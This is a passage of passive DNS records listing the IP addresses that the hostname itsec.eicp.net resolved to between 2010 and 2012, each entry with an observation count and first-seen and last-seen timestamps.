last seen 2012-07-07 00:45:00 -0000
itsec.eicp.net. A 115.170.173.42

count 18
first seen 2012-11-06 13:40:04 -0000
last seen 2012-11-06 23:40:03 -0000
itsec.eicp.net. A 115.170.173.75

count 60
first seen 2012-09-08 00:00:08 -0000
last seen 2012-09-08 14:14:33 -0000
itsec.eicp.net. A 115.170.174.85

count 14
first seen 2012-11-25 13:39:54 -0000
last seen 2012-11-25 23:39:54 -0000
itsec.eicp.net. A 115.170.174.246

count 2
first seen 2012-04-29 02:09:53 -0000
last seen 2012-04-29 02:49:35 -0000
itsec.eicp.net. A 115.170.175.206

count 6
first seen 2012-11-14 12:39:59 -0000
last seen 2012-11-14 16:19:59 -0000
itsec.eicp.net. A 115.170.176.233

count 39
first seen 2012-11-24 03:59:55 -0000
last seen 2012-11-25 09:39:54 -0000
itsec.eicp.net. A 115.170.177.113

count 2
first seen 2012-09-28 04:22:53 -0000
last seen 2012-09-28 04:23:53 -0000
itsec.eicp.net. A 115.170.177.198

count 1
first seen 2012-07-27 05:40:03 -0000
last seen 2012-07-27 05:40:03 -0000
itsec.eicp.net. A 115.170.183.100

count 3
first seen 2012-07-26 04:40:03 -0000
last seen 2012-07-26 06:20:03 -0000
itsec.eicp.net. A 115.170.185.163

count 3
first seen 2012-09-05 13:00:10 -0000
last seen 2012-09-05 14:40:10 -0000
itsec.eicp.net. A 115.170.187.43

count 322
first seen 2012-09-07 04:33:24 -0000
last seen 2012-09-07 23:30:01 -0000
itsec.eicp.net. A 115.170.188.46

count 2
first seen 2012-07-12 04:44:59 -0000
last seen 2012-07-12 05:14:58 -0000
itsec.eicp.net. A 115.170.188.77

count 21
first seen 2012-05-06 03:49:35 -0000
last seen 2012-05-06 15:19:35 -0000
itsec.eicp.net. A 115.170.189.57

count 21
first seen 2012-05-02 14:35:48 -0000
last seen 2012-05-02 15:41:43 -0000
itsec.eicp.net. A 115.170.191.71

count 13
first seen 2012-07-25 11:40:03 -0000
last seen 2012-07-25 23:40:03 -0000
itsec.eicp.net. A 115.170.191.95

count 1
first seen 2012-04-29 14:49:34 -0000
last seen 2012-04-29 14:49:34 -0000
itsec.eicp.net. A 115.170.194.66

count 29
first seen 2012-04-05 14:01:21 -0000
last seen 2012-04-05 15:29:45 -0000
itsec.eicp.net. A 115.170.194.179

count 361
first seen 2012-10-13 11:20:14 -0000
last seen 2012-10-13 20:09:55 -0000
itsec.eicp.net. A 115.170.195.248

count 6
first seen 2012-07-05 04:15:00 -0000
last seen 2012-07-05 06:15:00 -0000
itsec.eicp.net. A 115.170.197.19

count 13
first seen 2012-07-20 10:30:06 -0000
last seen 2012-07-21 00:00:06 -0000
itsec.eicp.net. A 115.170.197.38

count 59
first seen 2012-10-17 10:27:47 -0000
last seen 2012-10-17 16:46:18 -0000
itsec.eicp.net. A 115.170.197.82

count 18
first seen 2012-05-14 04:13:01 -0000
last seen 2012-05-14 05:44:50 -0000
itsec.eicp.net. A 115.170.199.39

count 13
first seen 2012-08-04 05:39:59 -0000
last seen 2012-08-04 14:19:59 -0000
itsec.eicp.net. A 115.170.200.88

count 1
first seen 2012-08-30 16:28:22 -0000
last seen 2012-08-30 16:28:22 -0000
itsec.eicp.net. A 115.170.202.130

count 1
first seen 2012-01-29 02:34:32 -0000
last seen 2012-01-29 02:34:32 -0000
itsec.eicp.net. A 115.170.203.242

count 10
first seen 2012-09-14 04:20:10 -0000
last seen 2012-09-14 13:00:10 -0000
itsec.eicp.net. A 115.170.204.136

count 6
first seen 2012-07-11 10:59:59 -0000
last seen 2012-07-11 13:14:59 -0000
itsec.eicp.net. A 115.170.205.46

count 7
first seen 2012-05-05 01:49:36 -0000
last seen 2012-05-05 08:19:36 -0000
itsec.eicp.net. A 115.170.206.142

count 93
first seen 2012-03-26 14:49:55 -0000
last seen 2012-03-27 01:01:52 -0000
itsec.eicp.net. A 115.170.209.192

count 114
first seen 2012-10-26 23:01:38 -0000
last seen 2012-10-27 00:53:45 -0000
itsec.eicp.net. A 115.170.209.203

count 1
first seen 2012-02-01 04:50:49 -0000
last seen 2012-02-01 04:50:49 -0000
itsec.eicp.net. A 115.170.210.246

count 2
first seen 2012-09-01 09:00:02 -0000
last seen 2012-09-01 12:20:02 -0000
itsec.eicp.net. A 115.170.211.51

count 1476
first seen 2012-09-14 23:30:11 -0000
last seen 2012-09-16 23:59:25 -0000
itsec.eicp.net. A 115.170.211.134

count 2
first seen 2012-07-11 05:29:59 -0000
last seen 2012-07-11 06:44:59 -0000
itsec.eicp.net. A 115.170.212.68

count 4
first seen 2012-07-21 11:30:06 -0000
last seen 2012-07-21 13:30:05 -0000
itsec.eicp.net. A 115.170.212.70

count 238
first seen 2012-08-23 01:18:55 -0000
last seen 2012-08-23 04:49:44 -0000
itsec.eicp.net. A 115.170.212.86

count 16
first seen 2012-11-29 15:19:53 -0000
last seen 2012-11-30 01:59:52 -0000
itsec.eicp.net. A 115.170.212.115

count 1
first seen 2012-02-04 08:48:54 -0000
last seen 2012-02-04 08:48:54 -0000
itsec.eicp.net. A 115.170.212.157

count 65
first seen 2012-04-04 14:21:15 -0000
last seen 2012-04-04 21:09:00 -0000
itsec.eicp.net. A 115.170.215.138

count 350
first seen 2012-10-24 12:20:10 -0000
last seen 2012-10-25 02:41:44 -0000
itsec.eicp.net. A 115.170.217.225

count 29
first seen 2012-10-26 18:20:08 -0000
last seen 2012-10-26 19:37:15 -0000
itsec.eicp.net. A 115.170.219.89

count 17
first seen 2012-07-02 11:00:02 -0000
last seen 2012-07-02 18:15:01 -0000
itsec.eicp.net. A 115.170.219.235

count 3
first seen 2012-10-03 11:40:04 -0000
last seen 2012-10-03 13:40:04 -0000
itsec.eicp.net. A 115.170.221.125

count 1
first seen 2011-08-25 04:35:29 -0000
last seen 2011-08-25 04:35:29 -0000
itsec.eicp.net. A 115.170.231.191

count 46
first seen 2012-05-09 14:33:03 -0000
last seen 2012-05-09 16:33:13 -0000
itsec.eicp.net. A 115.170.236.178

count 1
first seen 2012-04-30 02:19:41 -0000
last seen 2012-04-30 02:19:41 -0000
itsec.eicp.net. A 115.170.237.235

count 31
first seen 2012-04-11 04:32:02 -0000
last seen 2012-04-11 06:05:00 -0000
itsec.eicp.net. A 115.170.238.56

count 151
first seen 2012-03-10 15:52:54 -0000
last seen 2012-03-12 01:29:13 -0000
itsec.eicp.net. A 115.171.4.134

count 44
first seen 2012-04-20 13:58:49 -0000
last seen 2012-04-20 15:19:12 -0000
itsec.eicp.net. A 115.171.4.239

count 63
first seen 2012-04-09 11:21:31 -0000
last seen 2012-04-09 14:56:01 -0000
itsec.eicp.net. A 115.171.5.76

count 160
first seen 2012-03-28 04:29:32 -0000
last seen 2012-03-28 11:51:35 -0000
itsec.eicp.net. A 115.171.10.216

count 8
first seen 2012-03-01 17:49:47 -0000
last seen 2012-03-02 01:19:47 -0000
itsec.eicp.net. A 115.171.15.22

count 5
first seen 2012-02-27 18:19:50 -0000
last seen 2012-02-27 22:49:49 -0000
itsec.eicp.net. A 115.171.15.58

count 10
first seen 2012-02-29 17:19:47 -0000
last seen 2012-03-01 02:19:49 -0000
itsec.eicp.net. A 115.171.17.183

count 1
first seen 2011-08-28 09:30:45 -0000
last seen 2011-08-28 09:30:45 -0000
itsec.eicp.net. A 115.171.18.98

count 56
first seen 2012-03-28 13:58:12 -0000
last seen 2012-03-28 22:19:53 -0000
itsec.eicp.net. A 115.171.34.145

count 4
first seen 2012-03-13 16:04:13 -0000
last seen 2012-03-13 16:24:48 -0000
itsec.eicp.net. A 115.171.37.32

count 202
first seen 2012-04-17 15:11:11 -0000
last seen 2012-04-18 00:49:43 -0000
itsec.eicp.net. A 115.171.37.160

count 421
first seen 2012-04-01 13:28:25 -0000
last seen 2012-04-02 13:53:19 -0000
itsec.eicp.net. A 115.171.38.40

count 417
first seen 2012-04-06 04:32:58 -0000
last seen 2012-04-07 08:26:20 -0000
itsec.eicp.net. A 115.171.40.114

count 1
first seen 2012-01-18 10:34:52 -0000
last seen 2012-01-18 10:34:52 -0000
itsec.eicp.net. A 115.171.41.235

count 170
first seen 2012-03-17 13:27:57 -0000
last seen 2012-03-19 01:50:00 -0000
itsec.eicp.net. A 115.171.45.117

count 165
first seen 2012-04-10 13:56:18 -0000
last seen 2012-04-11 00:18:44 -0000
itsec.eicp.net. A 115.171.46.36

count 33
first seen 2012-04-16 04:24:33 -0000
last seen 2012-04-16 06:02:55 -0000
itsec.eicp.net. A 115.171.47.8

count 1
first seen 2012-05-03 04:49:37 -0000
last seen 2012-05-03 04:49:37 -0000
itsec.eicp.net. A 115.171.47.154

count 274
first seen 2012-04-12 04:24:01 -0000
last seen 2012-04-12 16:25:03 -0000
itsec.eicp.net. A 115.171.49.46

count 1
first seen 2011-10-25 05:34:55 -0000
last seen 2011-10-25 05:34:55 -0000
itsec.eicp.net. A 115.171.51.175

count 2
first seen 2012-01-06 00:33:42 -0000
last seen 2012-01-06 04:54:23 -0000
itsec.eicp.net. A 115.171.61.159

count 1
first seen 2011-08-24 12:34:23 -0000
last seen 2011-08-24 12:34:23 -0000
itsec.eicp.net. A 115.171.100.183

count 17
first seen 2012-04-25 13:29:17 -0000
last seen 2012-04-25 15:08:09 -0000
itsec.eicp.net. A 115.171.112.80

count 2
first seen 2012-02-15 14:39:28 -0000
last seen 2012-02-15 22:35:13 -0000
itsec.eicp.net. A 115.171.114.160

count 126
first seen 2012-05-10 14:11:59 -0000
last seen 2012-05-10 23:49:32 -0000
itsec.eicp.net. A 115.171.116.27

count 1
first seen 2012-01-01 12:46:09 -0000
last seen 2012-01-01 12:46:09 -0000
itsec.eicp.net. A 115.171.118.227

count 34
first seen 2012-02-25 19:19:53 -0000
last seen 2012-02-27 02:19:52 -0000
itsec.eicp.net. A 115.171.119.50

count 21
first seen 2012-03-16 14:05:50 -0000
last seen 2012-03-16 16:25:27 -0000
itsec.eicp.net. A 115.171.121.27

count 51
first seen 2012-04-20 04:20:46 -0000
last seen 2012-04-20 06:11:42 -0000
itsec.eicp.net. A 115.171.124.245

count 51
first seen 2012-04-17 04:22:55 -0000
last seen 2012-04-17 06:04:51 -0000
itsec.eicp.net. A 115.171.127.215

count 5
first seen 2012-03-22 16:00:36 -0000
last seen 2012-03-22 16:35:24 -0000
itsec.eicp.net. A 115.171.128.17

count 1
first seen 2011-09-05 04:36:11 -0000
last seen 2011-09-05 04:36:11 -0000
itsec.eicp.net. A 115.171.132.26

count 4
first seen 2012-02-18 06:40:54 -0000
last seen 2012-02-18 16:34:15 -0000
itsec.eicp.net. A 115.171.132.46

count 6
first seen 2012-01-21 04:33:13 -0000
last seen 2012-01-21 07:58:11 -0000
itsec.eicp.net. A 115.171.135.11

count 1
first seen 2011-10-11 12:15:43 -0000
last seen 2011-10-11 12:15:43 -0000
itsec.eicp.net. A 115.171.138.110

count 9
first seen 2012-03-12 16:12:28 -0000
last seen 2012-03-12 17:11:57 -0000
itsec.eicp.net. A 115.171.139.104

count 1
first seen 2011-08-19 04:17:00 -0000
last seen 2011-08-19 04:17:00 -0000
itsec.eicp.net. A 115.171.141.206

count 190
first seen 2012-04-03 14:08:15 -0000
last seen 2012-04-04 01:47:55 -0000
itsec.eicp.net. A 115.171.143.109

count 5
first seen 2010-12-01 15:20:29 -0000
last seen 2010-12-01 15:36:54 -0000
itsec.eicp.net. A 116.69.44.161

count 4
first seen 2010-12-02 05:41:35 -0000
last seen 2010-12-02 05:58:30 -0000
itsec.eicp.net. A 116.69.194.241

count 131
first seen 2010-12-02 07:37:35 -0000
last seen 2012-10-23 08:20:10 -0000
itsec.eicp.net. A 120.50.35.60

count 18
first seen 2012-03-27 08:45:05 -0000
last seen 2012-04-18 09:44:26 -0000
itsec.eicp.net. A 122.147.136.56

count 30
first seen 2012-03-02 01:49:47 -0000
last seen 2012-03-02 15:05:01 -0000
itsec.eicp.net. A 123.117.16.92

count 16
first seen 2012-03-27 23:59:35 -0000
last seen 2012-03-28 00:28:31 -0000
itsec.eicp.net. A 123.117.16.231

count 20
first seen 2012-03-27 06:26:59 -0000
last seen 2012-03-27 08:25:18 -0000
itsec.eicp.net. A 123.117.19.168

count 42
first seen 2012-03-23 15:00:45 -0000
last seen 2012-03-23 18:01:57 -0000
itsec.eicp.net. A 123.117.20.202

count 10
first seen 2012-02-24 04:43:32 -0000
last seen 2012-02-24 11:19:52 -0000
itsec.eicp.net. A 123.117.22.18

count 43
first seen 2012-10-25 23:51:08 -0000
last seen 2012-10-26 00:30:12 -0000
itsec.eicp.net. A 123.120.96.128

count 4
first seen 2012-07-26 07:00:03 -0000
last seen 2012-07-26 10:20:04 -0000
itsec.eicp.net. A 123.120.96.150

count 78
first seen 2012-05-25 00:29:26 -0000
last seen 2012-05-25 04:19:17 -0000
itsec.eicp.net. A 123.120.96.159

count 3
first seen 2012-11-23 01:19:55 -0000
last seen 2012-11-23 02:59:55 -0000
itsec.eicp.net. A 123.120.96.235

count 26
first seen 2012-04-19 00:18:16 -0000
last seen 2012-04-19 03:22:14 -0000
itsec.eicp.net. A 123.120.97.27

count 136
first seen 2012-09-26 03:03:29 -0000
last seen 2012-09-26 06:20:06 -0000
itsec.eicp.net. A 123.120.97.101

count 405
first seen 2012-06-07 07:49:10 -0000
last seen 2012-06-08 03:22:56 -0000
itsec.eicp.net. A 123.120.97.156

count 12
first seen 2012-04-12 01:06:41 -0000
last seen 2012-04-12 01:48:41 -0000
itsec.eicp.net. A 123.120.97.193

count 341
first seen 2012-10-10 18:38:52 -0000
last seen 2012-10-10 23:44:29 -0000
itsec.eicp.net. A 123.120.98.22

count 1
first seen 2012-05-31 06:49:15 -0000
last seen 2012-05-31 06:49:15 -0000
itsec.eicp.net. A 123.120.98.116

count 219
first seen 2012-09-13 00:52:22 -0000
last seen 2012-09-13 04:13:08 -0000
itsec.eicp.net. A 123.120.98.161

count 164
first seen 2012-06-18 00:19:40 -0000
last seen 2012-06-18 06:11:04 -0000
itsec.eicp.net. A 123.120.99.30

count 2
first seen 2012-09-02 23:44:23 -0000
last seen 2012-09-03 01:07:04 -0000
itsec.eicp.net. A 123.120.99.39

count 4
first seen 2012-12-05 01:00:19 -0000
last seen 2012-12-05 02:40:19 -0000
itsec.eicp.net. A 123.120.99.74

count 42
first seen 2012-09-16 23:59:53 -0000
last seen 2012-09-17 04:17:23 -0000
itsec.eicp.net. A 123.120.99.86

count 1
first seen 2012-08-27 00:20:04 -0000
last seen 2012-08-27 00:20:04 -0000
itsec.eicp.net. A 123.120.99.110

count 1
first seen 2012-05-29 06:49:18 -0000
last seen 2012-05-29 06:49:18 -0000
itsec.eicp.net. A 123.120.99.151

count 56
first seen 2012-04-19 23:46:33 -0000
last seen 2012-04-20 03:36:24 -0000
itsec.eicp.net. A 123.120.99.159

count 2
first seen 2012-07-13 00:14:58 -0000
last seen 2012-07-13 00:29:57 -0000
itsec.eicp.net. A 123.120.99.190

count 17
first seen 2012-08-29 23:49:04 -0000
last seen 2012-08-30 09:40:03 -0000
itsec.eicp.net. A 123.120.100.41

count 17
first seen 2012-09-26 23:41:23 -0000
last seen 2012-09-27 03:52:35 -0000
itsec.eicp.net. A 123.120.100.90

count 42
first seen 2012-10-16 23:49:02 -0000
last seen 2012-10-17 10:26:46 -0000
itsec.eicp.net. A 123.120.100.101

count 42
first seen 2012-04-20 06:49:48 -0000
last seen 2012-04-20 08:44:04 -0000
itsec.eicp.net. A 123.120.100.205

count 8
first seen 2012-09-18 00:34:23 -0000
last seen 2012-09-18 03:43:33 -0000
itsec.eicp.net. A 123.120.101.23

count 9
first seen 2012-07-24 07:20:04 -0000
last seen 2012-07-24 15:20:04 -0000
itsec.eicp.net. A 123.120.101.94

count 29
first seen 2012-05-07 23:47:17 -0000
last seen 2012-05-08 03:49:34 -0000
itsec.eicp.net. A 123.120.101.100

count 1
first seen 2012-10-30 08:40:07 -0000
last seen 2012-10-30 08:40:07 -0000
itsec.eicp.net. A 123.120.101.162

count 11
first seen 2012-07-02 00:09:49 -0000
last seen 2012-07-02 03:30:05 -0000
itsec.eicp.net. A 123.120.101.189

count 17
first seen 2012-10-23 23:59:06 -0000
last seen 2012-10-24 09:47:21 -0000
itsec.eicp.net. A 123.120.101.204

count 1
first seen 2012-07-11 02:14:59 -0000
last seen 2012-07-11 02:14:59 -0000
itsec.eicp.net. A 123.120.102.25

count 1
first seen 2011-10-10 06:09:30 -0000
last seen 2011-10-10 06:09:30 -0000
itsec.eicp.net. A 123.120.102.114

count 5
first seen 2012-05-30 06:19:15 -0000
last seen 2012-05-30 13:19:18 -0000
itsec.eicp.net. A 123.120.102.160

count 2
first seen 2012-05-09 01:04:11 -0000
last seen 2012-05-09 01:16:46 -0000
itsec.eicp.net. A 123.120.102.212

count 1
first seen 2012-12-04 03:40:20 -0000
last seen 2012-12-04 03:40:20 -0000
itsec.eicp.net. A 123.120.102.252

count 2
first seen 2012-11-07 23:40:04 -0000
last seen 2012-11-08 02:00:02 -0000
itsec.eicp.net. A 123.120.103.6

count 5
first seen 2012-07-25 00:20:04 -0000
last seen 2012-07-25 04:00:03 -0000
itsec.eicp.net. A 123.120.103.8

count 15
first seen 2012-09-04 00:18:43 -0000
last seen 2012-09-04 00:32:12 -0000
itsec.eicp.net. A 123.120.103.50

count 1
first seen 2012-07-20 07:00:06 -0000
last seen 2012-07-20 07:00:06 -0000
itsec.eicp.net. A 123.120.103.147

count 2
first seen 2012-06-01 01:53:59 -0000
last seen 2012-06-01 02:49:14 -0000
itsec.eicp.net. A 123.120.103.242

count 3
first seen 2012-07-06 12:45:00 -0000
last seen 2012-07-06 14:15:00 -0000
itsec.eicp.net. A 123.120.104.16

count 5
first seen 2012-07-03 06:45:01 -0000
last seen 2012-07-03 09:30:01 -0000
itsec.eicp.net. A 123.120.104.49

count 13
first seen 2012-11-08 03:00:02 -0000
last seen 2012-11-08 11:00:03 -0000
itsec.eicp.net. A 123.120.104.77

count 2
first seen 2012-07-26 01:20:03 -0000
last seen 2012-07-26 03:00:03 -0000
itsec.eicp.net. A 123.120.104.93

count 1
first seen 2012-01-25 04:33:52 -0000
last seen 2012-01-25 04:33:52 -0000
itsec.eicp.net. A 123.120.105.159

count 5
first seen 2012-07-12 06:44:59 -0000
last seen 2012-07-12 09:29:59 -0000
itsec.eicp.net. A 123.120.106.70

count 3
first seen 2012-11-06 01:40:03 -0000
last seen 2012-11-06 03:40:05 -0000
itsec.eicp.net. A 123.120.106.92

count 32
first seen 2012-05-17 23:44:22 -0000
last seen 2012-05-18 03:42:27 -0000
itsec.eicp.net. A 123.120.106.139

count 40
first seen 2012-05-11 00:10:12 -0000
last seen 2012-05-14 10:04:49 -0000
itsec.eicp.net. A 123.120.106.234

count 1
first seen 2012-05-03 03:19:38 -0000
last seen 2012-05-03 03:19:38 -0000
itsec.eicp.net. A 123.120.107.6

count 3
first seen 2012-09-24 02:37:53 -0000
last seen 2012-09-24 02:40:06 -0000
itsec.eicp.net. A 123.120.107.63

count 51
first seen 2012-04-10 06:18:58 -0000
last seen 2012-04-10 09:54:24 -0000
itsec.eicp.net. A 123.120.107.82

count 30
first seen 2012-09-07 03:02:48 -0000
last seen 2012-09-07 04:29:57 -0000
itsec.eicp.net. A 123.120.107.130

count 5
first seen 2012-07-03 00:30:02 -0000
last seen 2012-07-03 03:15:01 -0000
itsec.eicp.net. A 123.120.107.173

count 41
first seen 2012-08-31 00:00:03 -0000
last seen 2012-08-31 00:44:18 -0000
itsec.eicp.net. A 123.120.107.211

count 29
first seen 2012-10-29 00:00:07 -0000
last seen 2012-10-29 23:20:07 -0000
itsec.eicp.net. A 123.120.108.2

count 3
first seen 2012-04-17 06:41:26 -0000
last seen 2012-04-17 06:43:28 -0000
itsec.eicp.net. A 123.120.108.46

count 10
first seen 2012-07-31 01:20:01 -0000
last seen 2012-07-31 06:20:01 -0000
itsec.eicp.net. A 123.120.108.71

count 3
first seen 2012-06-25 07:20:02 -0000
last seen 2012-06-25 08:20:02 -0000
itsec.eicp.net. A 123.120.108.75

count 4
first seen 2012-09-28 08:20:06 -0000
last seen 2012-09-28 12:20:06 -0000
itsec.eicp.net. A 123.120.108.98

count 162
first seen 2012-06-05 23:34:12 -0000
last seen 2012-06-06 08:49:11 -0000
itsec.eicp.net. A 123.120.108.147

count 2
first seen 2012-05-28 07:19:16 -0000
last seen 2012-05-28 08:49:16 -0000
itsec.eicp.net. A 123.120.108.176

count 51
first seen 2012-05-23 23:54:19 -0000
last seen 2012-05-24 04:20:30 -0000
itsec.eicp.net. A 123.120.108.180

count 74
first seen 2012-10-09 23:31:16 -0000
last seen 2012-10-10 04:45:37 -0000
itsec.eicp.net. A 123.120.108.212

count 2
first seen 2012-08-31 08:20:02 -0000
last seen 2012-08-31 10:00:03 -0000
itsec.eicp.net. A 123.120.108.245

count 43
first seen 2012-10-10 23:45:30 -0000
last seen 2012-10-11 00:45:40 -0000
itsec.eicp.net. A 123.120.109.88

count 13
first seen 2012-07-06 06:15:00 -0000
last seen 2012-07-06 12:00:00 -0000
itsec.eicp.net. A 123.120.109.150

count 2
first seen 2012-06-27 07:20:01 -0000
last seen 2012-06-27 09:20:01 -0000
itsec.eicp.net. A 123.120.109.158

count 5
first seen 2012-09-05 02:47:12 -0000
last seen 2012-09-05 04:00:10 -0000
itsec.eicp.net. A 123.120.110.4

count 3
first seen 2012-12-04 00:54:51 -0000
last seen 2012-12-04 01:40:20 -0000
itsec.eicp.net. A 123.120.110.25

count 1
first seen 2012-05-17 06:49:24 -0000
last seen 2012-05-17 06:49:24 -0000
itsec.eicp.net. A 123.120.110.49

count 2
first seen 2012-09-17 23:45:23 -0000
last seen 2012-09-17 23:54:30 -0000
itsec.eicp.net. A 123.120.110.52

count 1
first seen 2012-08-31 07:00:03 -0000
last seen 2012-08-31 07:00:03 -0000
itsec.eicp.net. A 123.120.110.78

count 9
first seen 2012-11-25 23:59:54 -0000
last seen 2012-11-26 10:19:54 -0000
itsec.eicp.net. A 123.120.110.172

count 6
first seen 2012-11-30 02:59:53 -0000
last seen 2012-11-30 08:39:54 -0000
itsec.eicp.net. A 123.120.110.212

count 5
first seen 2012-07-02 07:45:01 -0000
last seen 2012-07-02 08:30:03 -0000
itsec.eicp.net. A 123.120.110.233

count 11
first seen 2012-04-18 03:22:00 -0000
last seen 2012-04-18 03:53:05 -0000
itsec.eicp.net. A 123.120.111.168

count 9
first seen 2012-10-11 23:40:15 -0000
last seen 2012-10-12 02:59:31 -0000
itsec.eicp.net. A 123.120.111.201

count 6
first seen 2012-07-06 02:30:00 -0000
last seen 2012-07-06 06:00:00 -0000
itsec.eicp.net. A 123.120.112.147

count 1
first seen 2012-06-11 02:46:56 -0000
last seen 2012-06-11 02:46:56 -0000
itsec.eicp.net. A 123.120.112.180

count 102
first seen 2012-09-25 23:43:34 -0000
last seen 2012-09-26 02:47:11 -0000
itsec.eicp.net. A 123.120.112.218

count 10
first seen 2012-11-01 03:20:07 -0000
last seen 2012-11-01 14:40:10 -0000
itsec.eicp.net. A 123.120.113.17

count 7
first seen 2012-07-17 00:14:57 -0000
last seen 2012-07-17 03:14:58 -0000
itsec.eicp.net. A 123.120.113.45

count 155
first seen 2012-10-26 00:31:27 -0000
last seen 2012-10-26 02:55:06 -0000
itsec.eicp.net. A 123.120.113.120

count 9
first seen 2012-10-25 06:20:09 -0000
last seen 2012-10-25 09:20:09 -0000
itsec.eicp.net. A 123.120.113.245

count 27
first seen 2012-09-24 02:15:59 -0000
last seen 2012-09-24 02:36:38 -0000
itsec.eicp.net. A 123.120.113.251

count 10
first seen 2012-05-28 00:49:19 -0000
last seen 2012-05-28 06:04:50 -0000
itsec.eicp.net. A 123.120.114.46

count 108
first seen 2012-04-11 07:21:58 -0000
last seen 2012-04-11 13:45:41 -0000
itsec.eicp.net. A 123.120.114.90

count 2
first seen 2012-08-02 08:00:07 -0000
last seen 2012-08-02 09:40:02 -0000
itsec.eicp.net. A 123.120.114.185

count 18
first seen 2012-10-21 23:47:27 -0000
last seen 2012-10-22 10:40:11 -0000
itsec.eicp.net. A 123.120.114.207

count 75
first seen 2012-05-10 06:18:35 -0000
last seen 2012-05-10 09:19:15 -0000
itsec.eicp.net. A 123.120.114.208

count 4
first seen 2012-07-05 07:15:01 -0000
last seen 2012-07-05 08:45:00 -0000
itsec.eicp.net. A 123.120.114.228

count 1
first seen 2012-11-15 00:39:59 -0000
last seen 2012-11-15 00:39:59 -0000
itsec.eicp.net. A 123.120.114.242

count 85
first seen 2012-06-13 23:40:45 -0000
last seen 2012-06-14 04:18:43 -0000
itsec.eicp.net. A 123.120.115.194

count 1
first seen 2012-06-19 08:50:03 -0000
last seen 2012-06-19 08:50:03 -0000
itsec.eicp.net. A 123.120.115.210

count 5
first seen 2012-09-21 03:12:19 -0000
last seen 2012-09-21 04:40:07 -0000
itsec.eicp.net. A 123.120.116.52

count 10
first seen 2012-05-21 07:19:20 -0000
last seen 2012-12-04 13:00:19 -0000
itsec.eicp.net. A 123.120.116.95

count 17
first seen 2012-11-15 04:00:00 -0000
last seen 2012-11-15 22:59:58 -0000
itsec.eicp.net. A 123.120.116.168

count 180
first seen 2012-08-29 00:40:04 -0000
last seen 2012-08-29 06:27:10 -0000
itsec.eicp.net. A 123.120.116.181

count 13
first seen 2012-04-09 09:07:53 -0000
last seen 2012-04-09 09:49:46 -0000
itsec.eicp.net. A 123.120.116.185

count 1
first seen 2012-02-03 00:35:25 -0000
last seen 2012-02-03 00:35:25 -0000
itsec.eicp.net. A 123.120.117.47

count 1
first seen 2012-11-08 23:51:19 -0000
last seen 2012-11-08 23:51:19 -0000
itsec.eicp.net. A 123.120.117.74

count 16
first seen 2012-04-26 23:39:38 -0000
last seen 2012-04-27 02:49:36 -0000
itsec.eicp.net. A 123.120.117.83

count 38
first seen 2012-04-12 23:35:39 -0000
last seen 2012-04-13 02:31:53 -0000
itsec.eicp.net. A 123.120.117.100

count 9
first seen 2012-04-16 06:25:44 -0000
last seen 2012-04-16 06:48:33 -0000
itsec.eicp.net. A 123.120.117.189

count 3
first seen 2012-06-27 00:50:04 -0000
last seen 2012-06-27 02:20:40 -0000
itsec.eicp.net. A 123.120.117.214

count 64
first seen 2012-05-21 00:01:22 -0000
last seen 2012-05-21 05:51:13 -0000
itsec.eicp.net. A 123.120.118.98

count 5
first seen 2012-10-30 03:20:07 -0000
last seen 2012-10-30 05:00:08 -0000
itsec.eicp.net. A 123.120.118.101

count 2
first seen 2012-10-07 23:58:23 -0000
last seen 2012-10-07 23:58:23 -0000
itsec.eicp.net. A 123.120.118.107

count 1
first seen 2012-06-08 03:23:26 -0000
last seen 2012-06-08 03:23:26 -0000
itsec.eicp.net. A 123.120.118.127

count 14
first seen 2012-09-23 23:44:26 -0000
last seen 2012-09-23 23:57:00 -0000
itsec.eicp.net. A 123.120.118.132

count 1
first seen 2012-07-19 07:30:07 -0000
last seen 2012-07-19 07:30:07 -0000
itsec.eicp.net. A 123.120.118.139

count 38
first seen 2012-05-13 23:52:08 -0000
last seen 2012-05-14 03:42:16 -0000
itsec.eicp.net. A 123.120.118.155

count 397
first seen 2012-09-06 06:40:09 -0000
last seen 2012-09-07 03:02:32 -0000
itsec.eicp.net. A 123.120.118.180

count 4
first seen 2012-08-03 00:00:00 -0000
last seen 2012-08-03 02:40:00 -0000
itsec.eicp.net. A 123.120.118.225

count 5
first seen 2012-04-09 01:25:33 -0000
last seen 2012-04-09 01:44:01 -0000
itsec.eicp.net. A 123.120.119.41

count 1
first seen 2012-09-10 23:41:16 -0000
last seen 2012-09-10 23:41:16 -0000
itsec.eicp.net. A 123.120.119.62

count 9
first seen 2012-11-14 03:00:00 -0000
last seen 2012-11-14 11:59:59 -0000
itsec.eicp.net. A 123.120.119.82

count 1
first seen 2012-07-18 00:30:06 -0000
last seen 2012-07-18 00:30:06 -0000
itsec.eicp.net. A 123.120.119.128

count 0
first seen 2012-06-05 01:38:46 -0000
last seen 2012-06-05 01:38:46 -0000
itsec.eicp.net. A 123.120.119.144

count 11
first seen 2012-04-25 02:19:37 -0000
last seen 2012-04-25 09:38:57 -0000
itsec.eicp.net. A 123.120.120.3

count 10
first seen 2012-09-12 02:09:37 -0000
last seen 2012-09-12 03:46:55 -0000
itsec.eicp.net. A 123.120.120.35

count 32
first seen 2012-04-18 01:21:13 -0000
last seen 2012-04-18 03:19:42 -0000
itsec.eicp.net. A 123.120.120.79

count 1
first seen 2011-12-28 02:31:43 -0000
last seen 2011-12-28 02:31:43 -0000
itsec.eicp.net. A 123.120.120.82

count 1
first seen 2012-04-27 08:19:35 -0000
last seen 2012-04-27 08:19:35 -0000
itsec.eicp.net. A 123.120.120.86

count 276
first seen 2012-06-05 10:49:13 -0000
last seen 2012-06-05 23:32:56 -0000
itsec.eicp.net. A 123.120.120.154

count 16
first seen 2012-04-26 07:19:36 -0000
last seen 2012-11-07 12:40:03 -0000
itsec.eicp.net. A 123.120.120.174

count 5
first seen 2012-10-15 23:45:45 -0000
last seen 2012-10-16 00:59:19 -0000
itsec.eicp.net. A 123.120.120.235

count 6
first seen 2012-07-19 00:30:07 -0000
last seen 2012-07-19 05:30:07 -0000
itsec.eicp.net. A 123.120.120.252

count 9
first seen 2012-08-27 00:54:34 -0000
last seen 2012-08-27 03:40:04 -0000
itsec.eicp.net. A 123.120.121.6

count 3
first seen 2012-07-09 02:59:59 -0000
last seen 2012-07-09 03:59:59 -0000
itsec.eicp.net. A 123.120.121.51

count 62
first seen 2012-06-20 23:37:13 -0000
last seen 2012-06-21 03:37:11 -0000
itsec.eicp.net. A 123.120.121.53

count 1
first seen 2012-05-29 02:49:16 -0000
last seen 2012-05-29 02:49:16 -0000
itsec.eicp.net. A 123.120.121.56

count 4
first seen 2012-09-13 06:20:10 -0000
